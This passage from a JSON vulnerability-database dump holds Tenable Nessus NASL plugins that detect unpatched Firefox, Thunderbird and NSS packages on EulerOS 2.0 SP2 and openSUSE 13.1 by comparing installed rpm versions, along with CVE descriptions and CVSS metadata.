"CVE-2017-5390", "CVE-2017-5396"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:firefox", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1011.NASL", "href": "https://www.tenable.com/plugins/nessus/99857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99857);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-9079\",\n \"CVE-2016-9893\",\n \"CVE-2016-9895\",\n \"CVE-2016-9897\",\n \"CVE-2016-9898\",\n \"CVE-2016-9899\",\n \"CVE-2016-9900\",\n \"CVE-2016-9901\",\n \"CVE-2016-9902\",\n \"CVE-2016-9904\",\n \"CVE-2016-9905\",\n \"CVE-2017-5373\",\n \"CVE-2017-5375\",\n \"CVE-2017-5376\",\n \"CVE-2017-5378\",\n \"CVE-2017-5380\",\n \"CVE-2017-5383\",\n \"CVE-2017-5386\",\n \"CVE-2017-5390\",\n \"CVE-2017-5396\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : firefox (EulerOS-SA-2017-1011)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Multiple flaws were found in the processing of\n malformed web content. A web page containing malicious\n content could cause Firefox to crash or, potentially,\n execute arbitrary code with the privileges of the user\n running Firefox.\n (CVE-2016-9079,CVE-2016-9893,CVE-2016-9895,CVE-2016-989\n 7,CVE-2016-9898,CVE-2016-9899,CVE-2016-9900,CVE-2016-99\n 01,CVE-2016-9902,CVE-2016-9904,CVE-2016-9905,CVE-2017-5\n 373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\n CVE-2017-5380, CVE-2017-5383, CVE-2017-5386,\n CVE-2017-5390, CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1011\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb157a1d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-45.7.0-1.0.1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:44", "description": "This update to Mozilla Firefox 50.0.2, Thunderbird 45.5.1 and NSS 3.16.2 fixes a number of security issues.\n\nThe following vulnerabilities were fixed in Mozilla Firefox (MFSA 2016-89) :\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1 (bmo#1292443)\n\n - CVE-2016-5292: URL parsing causes crash (bmo#1288482)\n\n - CVE-2016-5297: Incorrect argument length checking in JavaScript (bmo#1303678)\n\n - CVE-2016-9064: Addons update must verify IDs match between current and new versions (bmo#1303418)\n\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in nsScriptLoadHandler (bmo#1299686)\n\n - CVE-2016-9067: heap-use-after-free in nsINode::ReplaceOrInsertBefore (bmo#1301777, bmo#1308922 (CVE-2016-9069))\n\n - CVE-2016-9068: heap-use-after-free in nsRefreshDriver (bmo#1302973)\n\n - CVE-2016-9075: WebExtensions can access the mozAddonManager API and use it to gain elevated privileges (bmo#1295324)\n\n - CVE-2016-9077: Canvas filters allow feDisplacementMaps to be applied to cross-origin images, allowing timing attacks on them (bmo#1298552)\n\n - CVE-2016-5291: Same-origin policy violation using local HTML file and saved shortcut file (bmo#1292159)\n\n - CVE-2016-9070: Sidebar bookmark can have reference to chrome window (bmo#1281071)\n\n - CVE-2016-9073: windows.create schema doesn't specify 'format': 'relativeUrl' (bmo#1289273)\n\n - CVE-2016-9076: select dropdown menu can be used for URL bar spoofing on e10s (bmo#1276976)\n\n - CVE-2016-9063: Possible integer overflow to fix inside XML_Parse in expat (bmo#1274777)\n\n - CVE-2016-9071: Probe browser history via HSTS/301 redirect + CSP (bmo#1285003)\n\n - CVE-2016-5289: Memory safety bugs fixed in Firefox 50\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR 45.5\n\n The following vulnerabilities were fixed in Mozilla NSS 3.26.1 :\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in divSpoiler (bmo#1293334)\n\n Mozilla Firefox now requires mozilla-nss 3.26.2.\n\n New features in Mozilla Firefox :\n\n - Updates to keyboard shortcuts Set a preference to have Ctrl+Tab cycle through tabs in recently used order View a page in Reader Mode by using Ctrl+Alt+R\n\n - Added option to Find in page that allows users to limit search to whole words only\n\n - Added download protection for a large number of executable file types on Windows, Mac and Linux\n\n - Fixed rendering of dashed and dotted borders with rounded corners (border-radius)\n\n - Added a built-in Emoji set for operating systems without native Emoji fonts\n\n - Blocked versions of libavcodec older than 54.35.1\n\n - additional locale\n\n mozilla-nss was updated to 3.26.2, incorporating the following changes :\n\n - the selfserv test utility has been enhanced to support ALPN (HTTP/1.1) and 0-RTT\n\n - The following CA certificate was added: CN = ISRG Root X1\n\n - NPN is disabled and ALPN is enabled by default\n\n - MD5 signature algorithms sent by the server in CertificateRequest messages are now properly ignored", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Mozilla Firefox / Thunderbird and NSS (openSUSE-2016-1407)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5289", "CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5292", "CVE-2016-5293", "CVE-2016-5294", "CVE-2016-5295", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-5298", "CVE-2016-5299", "CVE-2016-9061", "CVE-2016-9062", "CVE-2016-9063", "CVE-2016-9064", "CVE-2016-9065", "CVE-2016-9066", "CVE-2016-9067", "CVE-2016-9068", "CVE-2016-9069", "CVE-2016-9070", "CVE-2016-9071", "CVE-2016-9072", "CVE-2016-9073", "CVE-2016-9074", "CVE-2016-9075", "CVE-2016-9076", "CVE-2016-9077", "CVE-2016-9078", "CVE-2016-9079"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird-devel", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "p-cpe:/a:novell:opensuse:libfreebl3", "p-cpe:/a:novell:opensuse:libfreebl3-32bit", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3", "p-cpe:/a:novell:opensuse:libsoftokn3-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss", "p-cpe:/a:novell:opensuse:mozilla-nss-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debugsource", "p-cpe:/a:novell:opensuse:mozilla-nss-devel", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-tools", "p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-1407.NASL", "href": "https://www.tenable.com/plugins/nessus/95590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1407.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95590);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5289\", \"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5292\", \"CVE-2016-5293\", \"CVE-2016-5294\", \"CVE-2016-5295\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-5298\", \"CVE-2016-5299\", \"CVE-2016-9061\", \"CVE-2016-9062\", \"CVE-2016-9063\", \"CVE-2016-9064\", \"CVE-2016-9065\", \"CVE-2016-9066\", \"CVE-2016-9067\", \"CVE-2016-9068\", \"CVE-2016-9069\", \"CVE-2016-9070\", \"CVE-2016-9071\", \"CVE-2016-9072\", \"CVE-2016-9073\", \"CVE-2016-9074\", \"CVE-2016-9075\", \"CVE-2016-9076\", \"CVE-2016-9077\", \"CVE-2016-9078\", \"CVE-2016-9079\");\n\n script_name(english:\"openSUSE Security Update : Mozilla Firefox / Thunderbird and NSS (openSUSE-2016-1407)\");\n script_summary(english:\"Check for the openSUSE-2016-1407 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Mozilla Firefox 50.0.2, Thunderbird 45.5.1 and NSS\n3.16.2 fixes a number of security issues.\n\nThe following vulnerabilities were fixed in Mozilla Firefox (MFSA\n2016-89) :\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in\n rasterize_edges_1 (bmo#1292443)\n\n - CVE-2016-5292: URL parsing causes crash (bmo#1288482)\n\n - CVE-2016-5297: Incorrect argument length checking in\n JavaScript (bmo#1303678)\n\n - CVE-2016-9064: Addons update must verify IDs match\n between current and new versions (bmo#1303418)\n\n - CVE-2016-9066: Integer overflow leading to a buffer\n overflow in nsScriptLoadHandler (bmo#1299686)\n\n - CVE-2016-9067: heap-use-after-free in\n nsINode::ReplaceOrInsertBefore (bmo#1301777, bmo#1308922\n (CVE-2016-9069))\n\n - CVE-2016-9068: heap-use-after-free in nsRefreshDriver\n (bmo#1302973)\n\n - CVE-2016-9075: WebExtensions can access the\n mozAddonManager API and use it to gain elevated\n privileges (bmo#1295324)\n\n - CVE-2016-9077: Canvas filters allow feDisplacementMaps\n to be applied to cross-origin images, allowing timing\n attacks on them (bmo#1298552)\n\n - CVE-2016-5291: Same-origin policy violation using local\n HTML file and saved shortcut file (bmo#1292159)\n\n - CVE-2016-9070: Sidebar bookmark can have reference to\n chrome window (bmo#1281071)\n\n - CVE-2016-9073: windows.create schema doesn't specify\n 'format': 'relativeUrl' (bmo#1289273)\n\n - CVE-2016-9076: select dropdown menu can be used for URL\n bar spoofing on e10s (bmo#1276976)\n\n - CVE-2016-9063: Possible integer overflow to fix inside\n XML_Parse in expat (bmo#1274777)\n\n - CVE-2016-9071: Probe browser history via HSTS/301\n redirect + CSP (bmo#1285003)\n\n - CVE-2016-5289: Memory safety bugs fixed in Firefox 50\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50\n and Firefox ESR 45.5\n\n The following vulnerabilities were fixed in Mozilla NSS\n 3.26.1 :\n\n - CVE-2016-9074: Insufficient timing side-channel\n resistance in divSpoiler (bmo#1293334)\n\n Mozilla Firefox now requires mozilla-nss 3.26.2.\n\n New features in Mozilla Firefox :\n\n - Updates to keyboard shortcuts Set a preference to have\n Ctrl+Tab cycle through tabs in recently used order View\n a page in Reader Mode by using Ctrl+Alt+R\n\n - Added option to Find in page that allows users to limit\n search to whole words only\n\n - Added download protection for a large number of\n executable file types on Windows, Mac and Linux\n\n - Fixed rendering of dashed and dotted borders with\n rounded corners (border-radius)\n\n - Added a built-in Emoji set for operating systems without\n native Emoji fonts\n\n - Blocked versions of libavcodec older than 54.35.1\n\n - additional locale\n\n mozilla-nss was updated to 3.26.2, incorporating the\n following changes :\n\n - the selfserv test utility has been enhanced to support\n ALPN (HTTP/1.1) and 0-RTT\n\n - The following CA certificate was added: CN = ISRG Root\n X1\n\n - NPN is disabled and ALPN is enabled by default\n\n - MD5 signature algorithms sent by the server in\n CertificateRequest messages are now properly ignored\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1227538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1245791\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1245795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1246945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1246972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1247239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1274777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1276976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1281071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1285003\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1288482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1289273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1292159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1292443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1293334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1294438\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1295324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1298552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1299686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1300083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1301777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1302973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1303418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1303678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1306696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1308922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1317641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1321066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1010401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1010404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1010410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1010411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1010427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Mozilla Firefox / Thunderbird and NSS packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-branding-upstream-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-buildsymbols-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-debuginfo-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-debugsource-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-devel-50.0.2-131.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-translations-common-50.0.2-131.1\") ) flag++;\nif ( 